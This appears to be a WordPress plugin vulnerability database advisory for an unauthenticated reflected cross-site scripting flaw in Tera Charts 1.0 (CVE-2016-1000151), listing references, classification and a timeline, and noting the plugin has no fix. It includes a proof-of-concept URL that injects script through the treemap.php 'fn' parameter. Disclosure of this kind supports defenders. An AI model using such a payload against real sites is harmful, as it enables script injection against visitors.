Tera Charts 1.0 - Unauthenticated Cross-Site Scripting (XSS)



Proof of Concept
http://www.example.com/tera-charts/charts/treemap.php?fn=";</script><script>alert(1);</script><script>"&userid=1

Affects Plugin

no known fix - plugin closed

References

CVE: CVE-2016-1000151
URL: http://www.vapidlabs.com/wp/wp_advisory.php?v=455
URL: https://www.openwall.com/lists/oss-security/2016/05/11/12

Classification

Type: XSS
OWASP Top 10: A7: Cross-Site Scripting (XSS)
CWE: CWE-79

Miscellaneous

Original Researcher: Larry W. Cashdollar, @_larry0
Submitter: firefart
Submitter Website: https://firefart.at/
Submitter Twitter: _FireFart_
Verified: No
WPVDB ID: 8495

Timeline

Publicly Published: 2016-05-11 (about 4 years ago)
Added: 2016-05-11 (about 4 years ago)
Last Updated: 2020-02-20 (5 months ago)
